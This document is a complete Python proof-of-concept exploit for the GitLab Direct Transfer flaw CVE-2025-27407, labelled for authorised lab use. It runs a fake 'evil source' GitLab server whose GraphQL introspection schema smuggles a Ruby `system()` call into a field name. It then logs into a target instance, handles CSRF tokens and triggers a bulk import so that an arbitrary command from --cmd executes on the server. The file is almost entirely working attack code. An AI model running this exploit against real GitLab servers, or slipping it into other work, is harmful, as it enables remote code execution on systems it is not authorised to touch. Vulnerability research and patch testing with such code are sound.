README.md
Rendering markdown...
#!/usr/bin/env python3
import argparse
import html
import http.cookiejar
import json
import re
import shlex
import threading
import time
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
DEFAULT_CMD = "touch /tmp/cve_2025_27407_gitlab_marker"
def log(message):
print(message, flush=True)
def scalar_field(name, scalar):
return {
"name": name,
"description": None,
"args": [],
"type": {"kind": "SCALAR", "name": scalar, "ofType": None},
"isDeprecated": False,
"deprecationReason": None,
}
def malicious_schema(command):
payload_name = f"safe\nend\nsystem({command!r})\ndef safe2"
return {
"data": {
"__schema": {
"queryType": {"name": "Query"},
"mutationType": None,
"subscriptionType": None,
"types": [
{
"kind": "OBJECT",
"name": "Query",
"description": None,
"fields": [
{
"name": "group",
"description": None,
"args": [
{
"name": "fullPath",
"description": None,
"type": {"kind": "SCALAR", "name": "ID", "ofType": None},
"defaultValue": None,
}
],
"type": {"kind": "OBJECT", "name": "Group", "ofType": None},
"isDeprecated": False,
"deprecationReason": None,
}
],
"interfaces": [],
},
{
"kind": "OBJECT",
"name": "Group",
"description": None,
"fields": [
scalar_field("id", "ID"),
scalar_field("name", "String"),
scalar_field("path", "String"),
scalar_field("description", "String"),
scalar_field("visibility", "String"),
scalar_field("emailsDisabled", "Boolean"),
scalar_field("lfsEnabled", "Boolean"),
scalar_field("mentionsDisabled", "Boolean"),
scalar_field("projectCreationLevel", "String"),
scalar_field("requestAccessEnabled", "Boolean"),
scalar_field("requireTwoFactorAuthentication", "Boolean"),
scalar_field("shareWithGroupLock", "Boolean"),
scalar_field("subgroupCreationLevel", "String"),
scalar_field("twoFactorGracePeriod", "Int"),
],
"interfaces": [],
},
{
"kind": "INPUT_OBJECT",
"name": "ExploitInput",
"description": None,
"inputFields": [
{
"name": payload_name,
"description": None,
"type": {"kind": "SCALAR", "name": "String", "ofType": None},
"defaultValue": None,
}
],
},
],
"directives": [],
}
}
}
class EvilSourceHandler(BaseHTTPRequestHandler):
payload_command = DEFAULT_CMD
events = []
saw_introspection = threading.Event()
def send_json(self, status, body):
data = json.dumps(body).encode()
self.send_response(status)
self.send_header("Content-Type", "application/json")
self.send_header("Content-Length", str(len(data)))
self.end_headers()
self.wfile.write(data)
def event(self, message):
EvilSourceHandler.events.append(message)
log(f"[evil-source] {message}")
def do_GET(self):
path = self.path.split("?", 1)[0]
if path in ("/api/v4/version", "/api/v4/metadata"):
self.event(f"GET {path}")
self.send_json(200, {"version": "16.11.8", "revision": "cve-2025-27407-lab", "enterprise": False})
elif path == "/api/v4/personal_access_tokens/self":
self.event(f"GET {path}")
self.send_json(200, {"id": 1, "name": "lab-token", "scopes": ["api"], "active": True})
elif path.endswith("/export_relations/status"):
self.event(f"GET {path}")
self.send_json(200, {"relations": []})
else:
self.event(f"GET {path} -> 404")
self.send_json(404, {"message": "not found"})
def do_POST(self):
path = self.path.split("?", 1)[0]
length = int(self.headers.get("Content-Length", "0"))
body = self.rfile.read(length).decode(errors="replace")
if path == "/api/graphql":
if "__schema" in body or "IntrospectionQuery" in body:
EvilSourceHandler.saw_introspection.set()
self.event(f"POST /api/graphql introspection -> malicious schema; command={self.payload_command!r}")
self.send_json(200, malicious_schema(self.payload_command))
else:
self.event("POST /api/graphql normal query")
self.send_json(
200,
{
"data": {
"group": {
"id": "gid://gitlab/Group/1",
"name": "evilgroup",
"path": "evilgroup",
"description": "lab group",
"visibility": "private",
"emailsDisabled": False,
"lfsEnabled": True,
"mentionsDisabled": False,
"projectCreationLevel": "developer",
"requestAccessEnabled": False,
"requireTwoFactorAuthentication": False,
"shareWithGroupLock": False,
"subgroupCreationLevel": "owner",
"twoFactorGracePeriod": 48,
}
}
},
)
elif path.endswith("/export_relations"):
self.event(f"POST {path} -> 404")
self.send_json(404, {"message": "export intentionally not implemented"})
else:
self.event(f"POST {path} -> 404")
self.send_json(404, {"message": "not found"})
def log_message(self, _format, *_args):
return
def start_evil_source(listen_host, listen_port, command):
EvilSourceHandler.payload_command = command
EvilSourceHandler.events = []
EvilSourceHandler.saw_introspection.clear()
server = ThreadingHTTPServer((listen_host, listen_port), EvilSourceHandler)
thread = threading.Thread(target=server.serve_forever, daemon=True)
thread.start()
log(f"[*] evil source listening on {listen_host}:{listen_port}")
return server
def wait_for_introspection(timeout_seconds):
log(f"[*] keeping evil source alive for up to {timeout_seconds}s while GitLab workers run")
deadline = time.time() + timeout_seconds
while time.time() < deadline:
if EvilSourceHandler.saw_introspection.wait(timeout=1):
log("[+] GitLab reached /api/graphql introspection over HTTP")
return True
log("[-] timed out waiting for /api/graphql introspection")
return False
class GitLabSession:
def __init__(self, base_url):
self.base_url = base_url.rstrip("/")
jar = http.cookiejar.CookieJar()
self.http = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
def request(self, method, path, data=None, headers=None, json_body=False, allow_http_error=False):
url = path if path.startswith("http") else self.base_url + path
request_headers = {"User-Agent": "cve-2025-27407-host-port-cmd-poc"}
if headers:
request_headers.update(headers)
body = None
if data is not None:
if json_body:
body = json.dumps(data).encode()
request_headers["Content-Type"] = "application/json"
else:
body = urllib.parse.urlencode(data, doseq=True).encode()
request_headers["Content-Type"] = "application/x-www-form-urlencoded"
request = urllib.request.Request(url, data=body, method=method, headers=request_headers)
try:
response = self.http.open(request, timeout=90)
return response.status, response.geturl(), response.headers, response.read().decode(errors="replace")
except urllib.error.HTTPError as exc:
if not allow_http_error:
raise
return exc.code, exc.geturl(), exc.headers, exc.read().decode(errors="replace")
def csrf_from(body):
patterns = [
r'name="csrf-token"\s+content="([^"]+)"',
r'content="([^"]+)"\s+name="csrf-token"',
r'name="authenticity_token"\s+value="([^"]+)"',
]
for pattern in patterns:
match = re.search(pattern, body)
if match:
return html.unescape(match.group(1))
raise RuntimeError("could not find CSRF token")
def trigger_import(gitlab, source_url, username, password):
status, _, _, body = gitlab.request("GET", "/users/sign_in")
log(f"[*] sign-in page status={status}")
csrf = csrf_from(body)
status, url, _, body = gitlab.request(
"POST",
"/users/sign_in",
{
"authenticity_token": csrf,
"user[login]": username,
"user[password]": password,
"user[remember_me]": "0",
},
{"Referer": f"{gitlab.base_url}/users/sign_in"},
allow_http_error=True,
)
log(f"[*] login status={status} final_url={url}")
if "users/sign_in" in url and status != 200:
raise RuntimeError("login failed")
csrf = csrf_from(body)
status, url, _, body = gitlab.request(
"POST",
"/import/bulk_imports/configure",
{
"authenticity_token": csrf,
"bulk_import_gitlab_url": source_url,
"bulk_import_gitlab_access_token": "fake-api-token-with-api-scope",
},
{"Referer": f"{gitlab.base_url}/import/bulk_imports/status"},
allow_http_error=True,
)
log(f"[*] configure status={status} final_url={url}")
if status >= 400:
raise RuntimeError(f"configure failed: {body[:500]}")
status, _, _, body = gitlab.request("GET", "/")
csrf = csrf_from(body)
destination_name = f"evilgroup-copy-{int(time.time())}"
status, url, _, body = gitlab.request(
"POST",
"/import/bulk_imports",
{
"bulk_import": [
{
"source_type": "group_entity",
"source_full_path": "evilgroup",
"destination_name": destination_name,
"destination_namespace": "",
"migrate_projects": False,
"migrate_memberships": False,
}
]
},
{
"Referer": f"{gitlab.base_url}/import/bulk_imports/status",
"X-CSRF-Token": csrf,
"Accept": "application/json",
},
json_body=True,
allow_http_error=True,
)
log(f"[*] create/import trigger status={status} final_url={url}")
log(body[:2000])
return status
def main():
parser = argparse.ArgumentParser(description="CVE-2025-27407 GitLab Direct Transfer PoC for local authorized lab use")
parser.add_argument("--host", required=True, help="GitLab host, e.g. 127.0.0.1")
parser.add_argument("--port", type=int, required=True, help="GitLab HTTP port, e.g. 18080")
parser.add_argument("--cmd", default=DEFAULT_CMD, help=f"Command to run in GitLab runtime, default: {DEFAULT_CMD!r}")
parser.add_argument("--scheme", default="http", choices=("http", "https"), help="GitLab scheme")
parser.add_argument("--username", default="root", help="GitLab username")
parser.add_argument("--password", default="Cve27407Password!", help="GitLab password")
parser.add_argument("--listen-host", default="0.0.0.0", help="Evil source bind host")
parser.add_argument("--listen-port", type=int, default=8001, help="Evil source bind port")
parser.add_argument("--wait-seconds", type=int, default=90, help="How long to keep the evil source alive after triggering import")
parser.add_argument(
"--source-url",
default=None,
help="URL GitLab should use to reach evil source; default uses host.containers.internal with --listen-port",
)
args = parser.parse_args()
source_url = args.source_url or f"http://host.containers.internal:{args.listen_port}"
gitlab_url = f"{args.scheme}://{args.host}:{args.port}"
log(f"[*] target GitLab: {gitlab_url}")
log(f"[*] source URL as seen by GitLab: {source_url}")
log(f"[*] test command: {args.cmd!r}")
log(f"[*] shell-safe display: {shlex.join(['sh', '-lc', args.cmd])}")
server = start_evil_source(args.listen_host, args.listen_port, args.cmd)
try:
trigger_import(GitLabSession(gitlab_url), source_url, args.username, args.password)
wait_for_introspection(args.wait_seconds)
log("[*] trigger sent; verify the command side effect on the GitLab runtime")
if EvilSourceHandler.events:
log("[*] evil source observed requests:")
for event in EvilSourceHandler.events[-20:]:
log(f" {event}")
finally:
server.shutdown()
if __name__ == "__main__":
main()